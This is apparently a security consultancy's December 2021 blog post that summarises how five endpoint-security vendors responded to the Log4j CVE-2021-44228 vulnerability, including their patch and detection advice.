Apache Log4j CVE-2021-44228

Cameron
Dec 16, 2021 1:25:07 PM

London Security sent out some emails about this last week, but it is important to acknowledge this threat is still out there, and provide something of a summary of various vendors answers to these problems.  We have following various security providers responses, and have summarized each here for you.  If there are additional questions, feel free to reach out to London Security Engineers - we would be happy to assist!

CrowdStrike

CrowdStrike KB Article

CrowdStrike does not require any updates to cover this threat.  Recommends the updates for the affected Apache issues.

Sophos

Sophos KB Article

Recommends the following, then provides some fixes to mitigate the vulnerabilities as well as affected Sophos Products:

While there are steps that customers can take to mitigate the vulnerability, the best fix is to upgrade to the patched version, already released by Apache in Log4j 2.15.0.

McAfee

McAfee KB Article

As of December 16th, 2021:

Added:

  • Endpoint Security mitigation measure leveraging 'Expert Rules' that trigger On-Demand Memory Scans to detect malicious LOG4J exploit behavior.
  • More IOC detections observed.for in-the-wild payloads 
  • A large addition to the product capabilities 'Detection and Response' section for ENS ExtraDAT and Exploit Rule coverage.
  • Over 40 hashes added to the hash table.
  • Two files, the raw TCL file containing the proper expert rule syntax, and the required ExtraDAT:
    • EXTRA.zip
    • Log4j_Expert_Rule_TCL.zip

Trend Micro

Trend KB Article

Trend talks about the issue and provides a tool to assist, a vulnerability tester for the issue.  They additionally recommend following the Apache Upgrade guidelines, and checking Apache logs for the potential indicators of compromise.  They DO NOT seem to have a specific product patch for this issue as of December 16th.

Sentinel One

Sentinel One KB Article

Their statement is simple, though they go over the threat in some detail.

"SentinelOne’s infrastructure, applications, products, and services aren’t vulnerable to the exploit. SentinelOne’s information technology, infrastructure, security, and cloud teams conducted a comprehensive assessment in accordance with our information security policies and procedures."

 

We at London Security are continuing to monitor this, and are looking at other solutions and how they respond accordingly.
2021

Read On

Security Vulnerabilities & Apps

We are seeing a startling number of security vulnerabilities in applications these days. A recent...

Security Logging Isn't Enough

Over the last several weeks, I've spoken to the costs of a breach, the costs of Security...

Security as a Competitive Advantage

Security is many things to your Board of Directors and your IT Managers: a requirement for...